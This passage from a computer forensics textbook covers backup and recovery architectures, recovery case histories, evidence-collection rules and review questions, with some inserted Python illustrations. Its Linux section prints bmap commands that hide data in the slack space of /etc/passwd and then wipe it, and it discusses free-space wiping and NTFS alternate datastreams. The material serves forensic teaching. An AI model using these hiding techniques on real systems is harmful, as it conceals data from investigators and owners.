national, of hacking into other classified computer systems based on information
generated by the corporation’s external auditing software program
...
Explain the company’s solution in detail regarding the organization’s investigation
into this matter
...
Part II
Computer Forensics Evidence and Capture
The second part of this book discusses data recovery, evidence collection and
data seizure, duplication and preservation of digital evidence, and computer
image verification and authentication
...
Files may be accidentally deleted
...
Computer viruses may corrupt files
...
Disgruntled employees may try to destroy your
files
...
You may think it’s lost forever, but you should employ the latest tools and techniques to recover your data
...
The advanced tools should allow us to find your files and
restore them for your use
...
Data recovery is, of course, of potential interest to anyone who has lost data to
the ravages of time, malice, or carelessness, but in forensic computing or analysis,
it takes on a new meaning—suddenly what other people have thrown away can become an important component in understanding what has happened in the past, as
burglary tools, data files, correspondence, and other clues can be left behind by
interlopers
...
Many people, even
computer experts, fail to recognize data recovery as an option during a data crisis,
yet it is possible to retrieve files that have been deleted and passwords that have
been forgotten or to recover entire hard drives that have been physically damaged
...
Perhaps your information has been subjected to a
virus attack, suffered damage from smoke or fire, or your drive has been immersed
in water—the data recovery experts can help you
...
What would happen to the productivity of your organization in the event of a
system-wide data center failure? For most companies, the loss would be catastrophic
...
Sales transactions would be impossible to complete and customer service
would suffer
...
DATA BACKUP AND RECOVERY
You live in a world that is driven by the exchange of information
...
Companies that can provide reliable and
rapid access to their information are now the fastest growing organizations in the
world
...
Fortunately, there are specialized hardware and software companies that
manufacture products for the centralized backup and recovery of business-critical data
...
Software companies have
created solutions that can back-up and recover dozens of disparate systems from
a single console
...
Compounding the problem is an overall lack of
experience in defining the features necessary for a successful backup application
...
Data Recovery
Backup Obstacles
The following are obstacles to backing up applications:
Backup window
Network bandwidth
System throughput
Lack of resources
Backup Window
The backup window is the period of time when backups can be run
...
However, many organizations now conduct operations 7 days a week, 24 hours a day—effectively eliminating traditional
backup windows altogether
...
If a network
cannot handle the impact of transporting hundreds of gigabytes of data over a short
period of time, the organization’s centralized backup strategy is not viable
...
These are
1
...
The ability of the backup server to accept data from multiple systems simultaneously
3
...
Lack of Resources
Many companies fail to make appropriate investments in data protection until it is
too late
...
These are just a few of the impediments that make implementation of an enterprise backup and recovery solution a low priority for some organizations
...
In addition, companies such as StorNet [3] provide specialized expertise in the deployment of complex, integrated storage solutions
...
These components are highly dependent on one another, and the overall system can only operate as well as its weakest link
...
The Backup Server
The backup server is responsible for managing the policies, schedules, media catalogs,
and indexes associated with the systems it is configured to back up
...
Traditionally, all managed data that was being backed up
had to be processed through the backup server
...
This meant that the
overall performance of a backup or recovery was directly related to the ability of the
backup server to handle the I/O load created by the backup process
...
Fortunately,
backup-software developers have created methods to work around these bottlenecks
...
This approach often involves attaching multiple tape servers to a shared tape library,
which reduces the overall cost of the system
...
1 is an example of a backup
configuration such as this [3]
...
This method of data backup removes the bottleneck of the backup server
completely
...
Figure 5
...
[Figure: Tape Library, Backup Server (Index), Tape Server (Index, Metadata), Backup Client, Backup Client. (© Copyright 2002, StorNet.)]
[Figure: Tape Library, Network, Data, Disk Array, Disk Array. (© Copyright 2002, StorNet.)]
The Network Data Path
Centralization of a data-management process such as backup and recovery requires
a robust and available network data path
...
Unfortunately, many companies are already struggling with simply managing the existing data traffic created by applications such as e-commerce, the Internet, email, and multimedia document management
...
If there is not enough bandwidth to move all the data, what are the options?
Again, it was the backup-software vendors who developed a remedy
...
For example, if
there is a 600-gigabyte database server that needs to be backed up nightly, a tape
backup device can be attached directly to that server
...
This approach is called a LAN-less backup, and it relies on a remote tape
server capability
...
3 demonstrates how this approach is configured [3]
...
This data path can be SCSI, Ethernet, ATM, fiber distributed data interface (FDDI), or fibre channel
...
SANs are quickly dominating
the backup landscape, and applications such as serverless and LAN-less backup
will continue to push this emerging technology forward
...
4 shows an example of a dedicated SAN topology [3]
...
FIGURE 5.3 A LAN-less backup using a remote tape server. (All rights reserved.)
FIGURE 5.4 A storage area network using serverless backup. (All rights reserved.)
A backup window defines how much time is
available to back up the network
...
Today, most
companies are managing too much data to complete backup during these ever-shrinking backup windows
...
However, the backup-software community
has once again developed a way to overcome the element of time by using incremental backup, block-level backup, image backups, and data archiving
...
On
average, no more than 5% of data in a file server changes daily
...
Even then, a full backup had to be made regularly, or restoration of the data
would take too long
...
Block-Level Incremental Backup
Block-level incremental backups provide similar benefits as incremental backups,
but with even more efficiency
...
This approach can reduce the amount of incremental data requiring backup nightly by orders of magnitude
...
Often the file system of the client must
be from the same vendor as the backup software
...
Nevertheless, block-level backups may be the only viable option for meeting your backup window
...
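The block-level incremental scheme described above, as an added example that is not the book's code or any backup vendor's product. A file is cut into fixed-size blocks and each block is hashed; the full backup stores every block, while an incremental stores only blocks whose hash differs from the hashes recorded at the previous backup, which is why a large file with a few changed bytes yields a very small nightly backup. restore() replays the chain in order, and the length of that chain is the reason the text still calls for a periodic full backup. The block size, file contents and change pattern are constructed for the example.

```python
"""Block-level incremental backup, reduced to its core mechanism.

Added example, not code from the book. Blocks are identified by position and
compared by SHA-256 digest; the per-block digests stand in for the index
and metadata a backup server keeps about each client.
"""
import hashlib

BLOCK_SIZE = 4096  # assumed block size for the example


def split_blocks(data: bytes) -> list[bytes]:
    """Cut data into BLOCK_SIZE pieces; the last piece may be short."""
    return [data[i:i + BLOCK_SIZE] for i in range(0, len(data), BLOCK_SIZE)]


def block_hashes(data: bytes) -> list[bytes]:
    """Per-block digests: the metadata the backup index records each run."""
    return [hashlib.sha256(b).digest() for b in split_blocks(data)]


def full_backup(data: bytes) -> dict:
    """A full backup carries every block of the file."""
    return {"kind": "full", "size": len(data), "blocks": dict(enumerate(split_blocks(data)))}


def incremental_backup(data: bytes, previous_hashes: list[bytes]) -> dict:
    """Carry only blocks that are new or whose digest changed since last run."""
    blocks = split_blocks(data)
    hashes = block_hashes(data)
    changed = {
        i: b
        for i, (b, h) in enumerate(zip(blocks, hashes))
        if i >= len(previous_hashes) or previous_hashes[i] != h
    }
    return {"kind": "incremental", "size": len(data), "blocks": changed}


def backup_bytes(backup: dict) -> int:
    """Payload that must cross the network and land on tape for this backup."""
    return sum(len(b) for b in backup["blocks"].values())


def restore(chain: list[dict]) -> bytes:
    """Rebuild the file from a full backup followed by its incrementals, in order."""
    if not chain or chain[0]["kind"] != "full":
        raise ValueError("a restore chain must start with a full backup")
    blocks: dict[int, bytes] = {}
    for backup in chain:
        blocks.update(backup["blocks"])  # later backups override earlier blocks
    final = chain[-1]
    n_blocks = -(-final["size"] // BLOCK_SIZE)  # ceiling; discards blocks of a file that shrank
    return b"".join(blocks[i] for i in range(n_blocks))[:final["size"]]


def demo() -> dict:
    """One full backup, then two nights of incrementals on a constructed 1 MiB file."""
    day0 = bytes(range(256)) * 4096  # exactly 256 blocks
    full = full_backup(day0)
    index = block_hashes(day0)

    day1 = bytearray(day0)
    day1[10:15] = b"edit1"                              # touches block 0
    day1[4096 * 200 + 7:4096 * 200 + 12] = b"edit2"     # touches block 200
    day1 = bytes(day1)
    incr1 = incremental_backup(day1, index)
    index = block_hashes(day1)

    day2 = day1 + b"appended log line\n"  # grows into a new block 256
    incr2 = incremental_backup(day2, index)

    return {
        "full_bytes": backup_bytes(full),
        "incr1_bytes": backup_bytes(incr1),
        "incr1_blocks": sorted(incr1["blocks"]),
        "incr2_blocks": sorted(incr2["blocks"]),
        "restore_ok": restore([full, incr1, incr2]) == day2,
    }


if __name__ == "__main__":
    print(demo())
```

The two nightly incrementals here move 8192 and 18 bytes respectively against a 1 MiB full backup, but every restore still has to read the full backup plus each incremental in sequence, which is the trade-off the text describes.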
This type
of backup creates copies, or snapshots, of a file system at a particular point in time
...
Image backups also provide specific point-in-time
backups that can be done every hour rather than once a day
...
By moving static, infrequently accessed data to
tape, backup applications are able to focus on backing up and recovering only the
most current and critical data
...
This method also provides the additional benefit of freeing up existing disk
space without adding required additional capacity
...
Therefore, it is important that the technical specifications of
the storage device provide adequate capacity and performance to accommodate existing and planned data
...
Backup windows,
growth rates, retention policies, duplicate tape copies, and network and server
throughputs all affect which backup storage device is best for your needs
...
Tape libraries today are available with 5 to 50,000 slots and can support
anywhere from 1 to 256 tape drives
...
When designing a centralized data backup, take particular care selecting the
right backup storage device
...
Verify that the shelf life of the media meets your long-term storage needs
...
Recommended Backup Features
Today’s global economy means that applications such as email, relational databases, e-commerce, and enterprise resource planning (ERP) systems must be accessible and online 24 hours a day
...
A backup vendor should
provide agents for the most common database and email applications that allow
these databases to be backed up without shutting down applications
...
Otherwise, the
clients must be backed up sequentially, which takes much longer
...
Off-site locations are
often not backed up at all because of the cost of deploying hardware and software
remotely and the lack of administrative support in these remote locations
...
A backup application should have
a method to back up systems across a WAN or over dial-up connections
...
Backup applications also need to be able to be accessed and administered from multiple locations
...
Performance
An enterprise backup application should be able to benchmark backup data rates
exceeding one terabyte per hour
...
Now, let’s explore some of the issues concerning the role of backup in data recovery and some of the technologies that are available today
...
THE ROLE OF BACKUP IN DATA RECOVERY
Many factors affect back-up:
Storage costs are decreasing
...
The role of backup has changed
...
This
has a huge impact on backup
...
Systems Have to Be Online Continuously
Seven/twenty-four (7 × 24) operations have become the norm in many of today’s
businesses
...
Higher and higher levels of fault tolerance for the primary data repository are a growing requirement
...
The Role of Backup Has Changed
It’s no longer just about restoring data
...
The role of backup now includes
the responsibility for recovering user errors and ensuring that good data has been
saved and can quickly be restored
...
To effectively accomplish backup in today’s environment,
tape management software is generally bundled with several other components to
provide a total backup solution
...
The media server runs tape management software
...
An alternative to tape backup is to physically replicate or mirror all data and
keep two copies online at all times
...
The advantage is that the data does not
have to be restored, so there are no issues with immediate data availability
...
Issues with Today’s Backup
Network backup creates network performance problems
...
This problem can be minimized by installing a separate network exclusively for backups, but even dedicated backup networks may become performance bottlenecks
...
Host processors must be quiescent
during the backup
...
Therefore, the time that the host is offline for data backup must be
minimized
...
Even in doing this, you have only deferred the real problem,
which is the time needed to restore the information
...
Live backups allow data access during the backup process but affect performance
...
The downside to the live backup is
that it puts a tremendous burden on the host
...
This requires consideration of local storage, host CPU
cycles, and host operating system dependencies
...
Mirroring doesn’t protect against user error and replication of bad data
...
However, synchronizing, breaking, and resynchronizing mirrors
is not a trivial process and influences data access speeds while they are occurring
...
Mirroring has its place in
backup and recovery but cannot solve the problem by itself
...
Recovery must be available at the
file level
...
Mirroring, or live data replication for hot recovery also has a role
...
Remote hot recovery sites are needed for immediate resumption of data access
...
Backup and mirroring are complementary, not
competing technologies
...
Just as programs must be decoupled from the memory in
which they’re executed, the stored information itself must be made independent of
the storage area it occupies
...
Two separate pipes for file access must be created: one pipe active and the other dynamic
...
Two copies of each change must be
kept, with a thread composed of all old data stored in the journaled file
...
This
area must be as large as the largest backup block (file, logical volume, etc
...
To minimize
this reserve storage area for backups, the storage device must support the reuse of
this area by dynamically remapping
...
Host CPU bottlenecks and network bottlenecks are then eliminated
...
What about restore times? Fast, nonrandom restoration of critical data assumes
that the user can select at the file level exactly which information comes back online
first
...
The necessary indexing of file structures can be done in the background subsequent to a high-speed backup
...
How achievable is this scenario? Many backup tools are available today
...
A few
storage vendors, mostly in the mainframe arena, provide some of these types of solutions
...
THE DATA-RECOVERY SOLUTION
Availability once meant that an application would be available during the week,
from 9 to 5, regardless of whether customers needed anything
...
But the world has changed
...
Even if a live human being isn’t available to help, many enterprise applications are Web-enabled so that customers can access their accounts in
the middle of the night while sitting at home in their pajamas
...
It
takes a lot of care and feeding to keep applications ready for work, and the people
who have maintained these environments for so long have other things they want
to do
...
Most of the bright youngsters who are
graduating from college this term haven’t had much exposure to mainframe concepts in their course work, much less any meaningful grasp of the day-to-day requirements for keeping mainframe systems running
...
Batch windows are shrinking down to
almost nothing
...
Application changes take place on the fly, under the watchful eye of the change-control police
...
In today’s gloomy economy, stockholders don’t want to hear that their favorite investment is having system availability problems
...
Disk
storage is more reliable than ever, but failures are still possible
...
Logic errors in programs or application of the wrong
update at the wrong time can result in a system crash or, worse, an undetected error
in the database—undetected, that is, until minutes, hours, or days later when a customer calls, a reconciliation fails, or some other checking mechanism points out the
integrity exposure
...
Flooding doesn’t always occur when it’s convenient; tornadoes never do
...
When they
strike your data center, wipe out your processing power, or even destroy your
basement-level backup power supply, you have a lot of recovering to do
...
Shrinking expertise and growing
complexity cry out for tools to make systems management more manageable, but
the tools that can save resources (by making the most of the ones you have) also
cost you resources to obtain, implement, and operate
...
Systems must remain available to make money and
serve customers
...
You must balance your data management budget against the cost of downtime
...
For this reason, installations around the world spend many
hours each week preparing their environments for the possibility of having to recover
...
You must evaluate your preparations,
make sure that all resources are available in usable condition, automate processes
as much as possible, and make sure you have the right kind of resources
...
They may or may not have had care and feeding through the years
to ensure that preparations are still sufficient to allow for recovery in the manner
required today
...
Will
this approach continue to satisfy their recovery requirements? Perhaps
...
However, if hundreds of logs must be applied, the time required for the recovery may be many
hours—often unacceptable when the cost of downtime is taken into account
...
What if a required resource is damaged or missing? How will you find out? When will you find out? Finding out at recovery time that some critical resource is missing can be disastrous!
Don’t Let Your Resources Fall Through the Cracks
The previous example was unrealistically simplistic
...
In a complex environment, how do you check to make sure that every database is being backed up?
How do you find out whether you are taking image copies (either batch or online)
as frequently as you planned? How do you determine whether your change accumulations are taken as often as you wanted? What if media errors occur? Identifying these types of conditions is critical to ensuring a successful recovery
...
For example, if the only person who understands your IBM Information Management System (IMS) systems (hierarchical
database system) and can recover them moved far away, you’re in trouble
...
Automation takes some of the human error factor and “think time” out of the
recovery equation and makes the complexity of the environment less of a concern
...
With proper planning and automation, recovery is made
possible, reliance on specific personnel is reduced, and the human-error factor is
nearly eliminated
...
In the event
of a disaster, the IMS recovery control (RECON) data sets must be modified in
preparation for the recovery
...
This
process often takes hours to perform manually, with the system down, equating to
lost money
...
Make Recoveries Efficient
Planning for efficient recoveries is also critical
...
Recovering multiple databases with one pass through your log data
certainly will save time
...
Where
downtime is costly, time saved is money in the bank
...
Take Backups
After you’ve thought about and planned for your recoveries, it’s time to think about
executing your plan
...
Your goal in backing up data is to do so quickly, efficiently, and usually
with minimal impact to your customers
...
These clean copies are
good recovery points and are easy to manage
...
You can take advantage of
recent technological changes in various ways
...
Both methods call for tools to
assist in the management of resources
...
Recent analysis of the security implications of “alternative datastreams”
on Windows NT has shown that the Windows NTFS filesystem allows data hiding in
alternative datastreams connected to files
...
Wiping the file means “securely” deleting it from disk (unlike the usual removal of file
entries from directories), so that file restoration becomes extremely expensive or
impossible [5]
...
Most Linux systems use the ext2 filesystem (or its
journaling version, ext3 by Red Hat)
...
Let’s start with the classic method to hide material on UNIX filesystems (not
even ext2 specific)
...
The file contents are still on disk and the space will not be reclaimed by other programs [5]
...
If the file is removed by /bin/rm, its content still remains on disk, unless overwritten by other files
...
They are based on the Linux Ext2fs Undeletion mini-HOWTO, which provides a nice guide to file recovery from Linux partitions
...
Overall, if recovery is attempted shortly after file removal and the partition is
promptly unmounted, chances of complete recovery are high
...
However, if you look at the problem from the forensics point of view, the
chances of recovering something (such as a small part of the illegal image for the
prosecution) are still very high
...
Thus, files can be hidden in free space
...
However, due to the intricacies of the ext2 filesystem, the
process can only be reliably automated for small files [5]
...
A filesystem uses addressable parts of the disk called blocks, which all have the same size
...
If a file is smaller than the block
size, the remaining space is wasted
...
This problem long
plagued early Windows 9x users with FAT16 filesystems, which had to use block
sizes of up to 32 K, thus wasting a huge amount of space if storing small files [5]
...
Thus, one can
reliably hide up to 4 KB of data per file if using a small file
...
An ext2 floppy (with a block size of 1 KB) allows hiding data as well,
albeit in smaller chunks [5]
...
Some of the examples follow [5]:
# echo "evil data is here" | bmap --mode putslack /etc/passwd
puts the data in the slack space of the /etc/passwd file
# bmap --mode slack /etc/passwd
getting from block 887048
file size was: 9428
slack size: 2860
block size: 4096
evil data is here
shows the data
# bmap --mode wipeslack /etc/passwd
cleans the slack space
...
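The slack-size arithmetic behind the bmap transcript above, as an added example that is not the book's code or part of the bmap tool. It reproduces the figures bmap reports for /etc/passwd (file size 9428, block size 4096, slack size 2860) and then shows the check an examiner would run on the raw last block of a file: on Linux the kernel zero-fills the unused tail of a block when it writes it, so non-zero bytes in the slack region deserve a closer look. The two sample blocks are constructed for the example.

```python
"""Slack-space arithmetic and a content check on a file's last block.

Added example, not code from the book or from bmap. The block size is the
4 KB default the text gives for ext2 on hard disks.
"""

BLOCK_SIZE = 4096


def slack_size(file_size: int, block_size: int = BLOCK_SIZE) -> int:
    """Bytes left unused in the last block allocated to a file.

    A file whose size is an exact multiple of the block size fills its last
    block completely, and an empty file owns no data block, so neither has slack.
    """
    if file_size <= 0:
        return 0
    used = file_size % block_size
    return 0 if used == 0 else block_size - used


def slack_bytes(last_block: bytes, file_size: int, block_size: int = BLOCK_SIZE) -> bytes:
    """Return the slack portion of a file's last data block.

    last_block is the raw content of that block (exactly block_size bytes);
    everything after file_size % block_size is slack.
    """
    if len(last_block) != block_size:
        raise ValueError("last_block must be exactly one block")
    used = file_size % block_size
    if file_size <= 0 or used == 0:
        return b""
    return last_block[used:]


def slack_report(last_block: bytes, file_size: int, block_size: int = BLOCK_SIZE) -> dict:
    """Summarise the slack region: how big it is and whether it holds anything but zeros."""
    slack = slack_bytes(last_block, file_size, block_size)
    nonzero = sum(1 for b in slack if b)
    return {
        "file_size": file_size,
        "slack_size": len(slack),
        "nonzero_bytes": nonzero,
        "has_hidden_data": nonzero > 0,
        "preview": slack.rstrip(b"\x00")[:32],  # up to the last non-zero byte
    }


# Constructed sample blocks mimicking the last block of a 9428-byte file:
# 9428 % 4096 == 1236 bytes of file content, then 2860 bytes of slack.
USED = 9428 % BLOCK_SIZE
CLEAN_BLOCK = b"A" * USED + b"\x00" * (BLOCK_SIZE - USED)
TAMPERED_BLOCK = b"A" * USED + b"hidden payload" + b"\x00" * (BLOCK_SIZE - USED - 14)


if __name__ == "__main__":
    print(slack_size(9428))  # 2860, the figure bmap prints above
    print(slack_report(CLEAN_BLOCK, 9428))
    print(slack_report(TAMPERED_BLOCK, 9428))
```

On a real system the raw last block comes from the block number the filesystem maps for the file (bmap prints it as "getting from block ..."), read from the unmounted device or an image of it; the arithmetic and the check are the same.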
Now let’s turn to discovering what is out there on the vast expanses
of the disk drive
...
Using a hex editor on the raw partition can sometimes shed
some light on the disk contents, but the process is extremely messy
...
Next, let’s briefly review how to prevent adversaries from finding private data
...
All but one can only be used to wipe files,
rather than empty disk space
...
Some do not work under certain circumstances or for specific filesystems
...
If this condition is not met, no secure deletion will be performed (with no error message) [5]
...
The simple method is to use a standard Linux “dd” utility
...
2
...
4
...
Doing the same for
the /tmp partition might cause some applications to crash, so one must be cautious [5]
...
The important fact is that when empty space is wiped, slack space for all files remains intact
...
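A toy block device that makes two statements from this section checkable, added here as an example that is not the book's code: a file removed with rm keeps its bytes on disk until the blocks are reused, and zero-filling the free space (the effect of the dd method) leaves the slack inside blocks that still belong to live files untouched. The device is a bytearray of fixed-size blocks with a minimal contiguous allocation table; the real ext2 layout is not reproduced, and the file names, contents and the seeded slack content are constructed for the example.

```python
"""Toy block device: what rm leaves behind, and what a free-space wipe misses.

Added example, not code from the book. The 1 KB block size matches the ext2
floppy mentioned in the text and keeps the device tiny.
"""


class ToyDisk:
    def __init__(self, n_blocks: int, block_size: int = 1024):
        self.block_size = block_size
        self.n_blocks = n_blocks
        self.data = bytearray(n_blocks * block_size)
        self.files: dict[str, tuple[int, int]] = {}  # name -> (first block, byte size)

    def blocks_needed(self, size: int) -> int:
        return max(1, -(-size // self.block_size))  # ceiling division

    def free_blocks(self) -> list[int]:
        used = set()
        for first, size in self.files.values():
            used.update(range(first, first + self.blocks_needed(size)))
        return [b for b in range(self.n_blocks) if b not in used]

    def write_file(self, name: str, content: bytes) -> int:
        """Place the file in the first contiguous free run and return its first block.
        The tail of its last block is zero-filled, as the Linux kernel does on write."""
        need = self.blocks_needed(len(content))
        free = self.free_blocks()
        for i in range(len(free) - need + 1):
            if free[i + need - 1] - free[i] == need - 1:
                first = free[i]
                break
        else:
            raise OSError("no contiguous free space")
        start = first * self.block_size
        self.data[start:start + need * self.block_size] = content.ljust(need * self.block_size, b"\x00")
        self.files[name] = (first, len(content))
        return first

    def rm(self, name: str) -> None:
        """Unlink removes only the allocation entry; the blocks keep their bytes."""
        del self.files[name]

    def slack_range(self, name: str) -> tuple[int, int]:
        """Byte offsets [lo, hi) of the slack in a live file's last block."""
        first, size = self.files[name]
        lo = first * self.block_size + size
        hi = (first + self.blocks_needed(size)) * self.block_size
        return lo, hi

    def wipe_free_space(self) -> int:
        """Zero every unallocated block (what filling the partition from /dev/zero
        and deleting the filler achieves) and return how many were zeroed."""
        free = self.free_blocks()
        for b in free:
            self.data[b * self.block_size:(b + 1) * self.block_size] = bytes(self.block_size)
        return len(free)

    def carve(self, needle: bytes) -> int:
        """Search the raw device, ignoring the allocation table, as an examiner
        with a hex editor or grep on the raw partition would; -1 if absent."""
        return self.data.find(needle)


def demo() -> dict:
    disk = ToyDisk(n_blocks=8)
    disk.write_file("notes.txt", b"N" * 100)              # block 0, live throughout
    disk.write_file("export.csv", b"payroll export 2003")  # block 1
    disk.rm("export.csv")
    visible_before_wipe = disk.carve(b"payroll export 2003") != -1

    # Seed slack content in the live file (the condition the bmap transcript
    # on this page produces) so the wipe's blind spot can be checked.
    lo, hi = disk.slack_range("notes.txt")
    disk.data[lo:lo + 11] = b"tucked away"

    zeroed = disk.wipe_free_space()
    return {
        "unlinked_content_visible_before_wipe": visible_before_wipe,
        "unlinked_content_visible_after_wipe": disk.carve(b"payroll export 2003") != -1,
        "slack_content_visible_after_wipe": disk.carve(b"tucked away") != -1,
        "slack_bytes_in_notes": hi - lo,
        "blocks_zeroed": zeroed,
    }


if __name__ == "__main__":
    print(demo())
```

The wipe removes the unlinked file's content but not the 11 bytes sitting in the live file's slack, which is why the text pairs free-space wiping with per-file tools such as bmap's wipeslack when the goal is to leave nothing recoverable.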
This section briefly touched upon hiding, finding, and destroying data on
Linux filesystems
...
Finally, let’s look at some disk and tape data-recovery case studies
...
CASE HISTORIES
If there is any data, anywhere on your disk or tape, it can be recovered
...
A Dog’s Dinner
Late one afternoon, customer service received a phone call from a distraught customer who required data recovery from a couple of diskettes
...
The customer was asked the nature of the problem and
eventually confessed that the diskettes had suffered some physical damage
...
The damage to the disk cases was severe, with large tooth marks evident on the
surface of the disks
...
All the files were successfully recovered and restored to the grateful customer
...
This was a
NetWare Server and RAID array in one large, very heavy metal box, containing 18
× 2
...
There were three failed drives amongst the remaining batch of eight drives
...
Using a database of drive components and technical knowledge, the system
administrator worked to correct the faults on the drives so he could take images
...
The total good sectors imaged that night was just under 88
million! The customer’s valuable data was safe
...
On contact with the system administrator, he finally mentioned that it had traveled in the cargo hold of a plane
...
Luckily for him, it had not been swipe-damaged by x-ray equipment at the airport
...
Following a successful headstack swap, the drive was
imaged and the system administrator found 112 bad sectors, of which he was finally
able to read only 86
...
Accounts Critical
It was Easter Saturday and the system administrator had a critical tape data loss that
another data-recovery company had failed to rectify
...
The tape was poorly recorded and had many areas where the recording had broken up
...
By 6 A.M. on Sunday, the system administrator was recovering data from seven DAT tapes and had extracted images of each of
the disks in the RAID
...
The areas of missing data were being reprocessed to attempt to extract additional data from the tapes
...
About 48 hours later, the system administrator was still working
on reading data from the damaged areas of the tapes
...
Sinking Ship
A seismic survey ship far away in a distant sea sent a system administrator an IBM
3590 tape
...
If the data could not
be recovered, they would have to send the ship back out to sea to repeat the tests—
a rather costly operation
...
The
40 kg monster is capable of storing 10 gigabytes of uncompressed data on a single
cartridge and transferring that data at up to 9 MB per second
...
Gaining control of these various systems, finding the undamaged data on the
tape, and then persuading the drive to read it was complex
...
All Flooded Out
A business continuity firm had a customer with a big problem
...
Sadly, a flood had filled the basement with water
and fine silt, and the engineers found that their archives and backups were soaked
through and the media was coated inside and out with a thin layer of sediment
...
Each tape was
extracted from its cartridge and installed in a special cleaning rig that removed any
sediment
...
After a few hours, the system administrator was able
to return the recovered files and folders on a total of 26 CD-ROMs; the engineers
were grateful for the return of their archives
...
Tropical Storm Allison visits the Texas Gulf coast and dumps
three feet of rain on the city
...
Their uninterruptible power
supply (UPS) system, network switches, and a portion of their direct access storage
devices (DASDs) are wiped out
...
They take weekly image copies, creating
dual copies concurrently so the second copy can be sent off-site
...
M
...
M
...
They run
the Check Assets function regularly to ensure that required assets are cataloged
...
Proof
Finally, when disaster strikes, XYZ springs into action, and the validity of their
preparations is proved
...
They initial
program load (IPL) their system and bring up the Recovery Manager interface
...
They
build the appropriate groups for their lost databases and build appropriate recovery JCL
...
Their data is restored without errors, their business
resumes quickly, and everyone lives happily ever after, all with minimal expense
and elapsed time
...
Backup has never really been the problem
...
Although data
backups would seem to offer an effective shield against these threats, backups do
not always provide comprehensive data protection
...
What is more, individuals often fail to test the restore capabilities of their
backup media
...
Finally, even if backups are successful, they only contain data collected during the most recent backup session
...
Conclusions
Data backup and recovery has become the “killer application” of storage area
networking
...
SAN-based backup offers benefits such as higher availability, increased flexibility, improved reliability, lower cost, manageability, improved performance,
and increased scalability
...
Whether
your business is retail, health care, banking, manufacturing, public utility, government agency, or almost any other endeavor, one thing is common: your
users expect more and more from your systems
...
How
does this growth affect your daily management of the data? What challenges do
you face? If a problem occurs, how do you get your applications back to normal in the most efficient manner possible?
Some files (especially on Linux systems) can and should be recovered with very
little effort or time
...
Ultimately, your odds of getting anything useful from the grave (dead storage) are often a question of personal diligence—how much is it worth to you? If it’s important enough, it’s quite possibly there
...
Contrary to the popular belief
that it’s hard to recover information, it’s actually starting to appear that it’s very
hard to remove something even if you want to
...
Now that’s data persistence
...
You need to continue the examination, for you have simply scratched the surface
...
1 in Appendix F), the
computer forensics specialist (CFS) should adhere to the provisional list of actions
for data recovery
...
A number of these systems
have been mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Data recovery is the process by which mediocre trained engineers
evaluate and extract data from damaged media and return it in an intact format
...
True or False? Fortunately, there are very few specialized hardware and software companies that manufacture products for the centralized backup and
recovery of business-critical data
...
True or False? Operationally, ready, or mirrored data does guard against data
corruption and user error
...
True or False? One of the most critical data-management tasks involves recovering data in the event of a solution
...
True or False? Wiping the file means “securely” adding it from disk (unlike the
usual removal of file entries from directories), so that file restoration becomes
extremely expensive or impossible
...
The following are obstacles to backing up applications, except:
A
...
Network bandwidth
C
...
System throughput
E
...
There are three I/O bottlenecks commonly found in traditional backup schemes,
except for two:
A
...
The ability of the backup server to not accept data from multiple systems
simultaneously
C
...
The available throughput of the tape device(s) onto which the data is moved
E
...
Below, are three of many factors that affect backup, except:
A
...
B
...
C
...
D
...
E
...
4
...
The backup server
B
...
The network
D
...
The backup storage device (or devices)
5
...
E-commerce
B
...
D
...
Multimedia document management
...
The fire safe where
they kept their backups had been left open that night after closing
...
How would the firm’s CFS team (CFST) go about investigating this case?
Case Project
Five fire-damaged UNIX server drives were literally shoveled out of the debris from
a large auto dealership fire
...
All financial data (inventory,
accounts payable and receivable, W-2s, customers and loan information) was destroyed
...
The attorney immediately needed all of the plaintiff company’s
emails and attachments over a six-month time frame meeting keyword and time
and date criteria
...
Emails and the system
were password protected and the passwords were not available
...
Electronic evidence
has none of the permanence that conventional evidence has, and it is even
more difficult to form into a coherent argument
...
Not
everything is covered here
...
No legal advice is given here—different regions have different legislation
...
This part of the chapter is not aimed at expert forensics analysts, as most of this
would be obvious to them
...
The simple reason for this is that there never is one
correct answer that will guide you through all investigations
...
WHY COLLECT EVIDENCE?
Electronic evidence can be very expensive to collect
...
So, why bother collecting the evidence in the first place? There are two simple reasons: future prevention and responsibility
...
It would be analogous to not fixing the lock on your door after someone broke in
...
Responsibility
There are two responsible parties after an attack: the attacker and the victim
...
The victim, on the other hand, has a responsibility to the community
...
The victim may also have a legal obligation to perform an
analysis of evidence collected, for instance if the attack on their system was part of
a larger attack
...
Both have their pros and cons
...
You also leave yourself open to
possible liability issues if the attacker launches further attacks at other systems from
your own network system
...
What you
choose to do should be based on the situation
...
OBSTACLES
Electronic crime is difficult to investigate and prosecute
...
Evidence Collection and Data Seizure
Add to this the fact that electronic records are extremely (and sometimes transparently) malleable and that electronic transactions currently have fewer limitations
than their paper-based counterparts and you get a collection nightmare
...
Any paper trail of computer records they may leave can be easily modified or destroyed, or may be only temporary
...
Because of this, even if the details of the transactions can be restored through
analysis, it is very difficult to tie the transaction to a person
...
Such information merely shows
that whoever did it either knew or could get past those identifiers
...
The best you can do is to follow the rules
of evidence collection and be as assiduous as possible
...
Without taking these into consideration, you may find that the
evidence you’ve spent several weeks and quite a bit of money collecting is useless
...
In electronic terms, this can be a log produced by an audit function—provided that
the log can be shown to be free from contamination
...
This type of evidence is
subject to the perceived reliability of the witness, but as long as the witness can be
considered reliable, testimonial evidence can be almost as powerful as real evidence
...
Hearsay
Hearsay is any evidence presented by a person who was not a direct witness
...
Hearsay is generally inadmissible in court and should be avoided
...
These relate to five properties
that evidence must have to be useful
...
1. Admissible
2. Authentic
3. Complete
4. Reliable
5. Believable
Admissible
Admissible is the most basic rule
...
Failure to comply with this rule is equivalent to not collecting the evidence in the first place, except the cost is higher
...
You must be able to show that the evidence relates to the incident in a relevant way
...
You collect not only evidence that can prove the attacker’s actions, but also evidence that could prove their innocence
...
This is called exculpatory evidence and is an
important part of proving a case
...
Your evidence collection and analysis
procedures must not cast doubt on the evidence’s authenticity and veracity
...
There’s no point presenting a binary dump of process memory if the jury has no
idea what it all means
...
Using the preceding five rules, you can derive some basic do’s and don’ts:
Minimize handling and corruption of original data
...
Comply with the five rules of evidence
...
Follow your local security policy
...
Be prepared to testify
...
Proceed from volatile to persistent evidence
...
Don’t run any programs on the affected system
...
Always handle secondary copies
...
You should make sure you don’t
run any programs that modify the access times of all files (such as tar and xcopy)
...
Account for Any Changes and Keep Detailed Logs of Your Actions
Sometimes evidence alteration is unavoidable
...
Any
changes at all should be accounted for—not only data alteration but also physical
